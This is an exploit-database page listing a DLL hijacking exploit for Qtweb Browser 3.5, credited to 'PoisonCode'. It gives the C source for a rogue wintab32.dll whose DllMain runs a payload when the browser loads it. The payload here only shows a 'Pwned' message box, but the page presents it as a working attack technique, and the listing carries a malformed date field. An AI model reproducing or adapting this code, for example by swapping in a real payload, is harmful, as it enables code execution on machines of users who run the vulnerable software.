[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Qtweb Browser v3.5 DLL Hijacking Exploit

Author
PoisonCode
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14907
Category
local exploits
Date add
30-11--0001
Platform
windows
========================================
Qtweb Browser v3.5 DLL Hijacking Exploit
========================================

# Title: Qtweb Browser v3.5  DLL Hijacking Exploit(wintab32.dll)
# Software:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable Software:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.5
# Tested on: Windows
# Author: PoisonCode
# Published: 2010-11-19
# CVE-ID:()
  
_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


#include <windows.h>
#define DllExport __declspec (dllexport)
int PS()
{
  MessageBox(0, "Pwned by PoisonCode-PanamaSecurity", "PSecurity", MB_OK);
  return 0;
}
BOOL WINAPI  DllMain (
			HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
			{
	PS();}



#  0day.today [2024-11-15]  #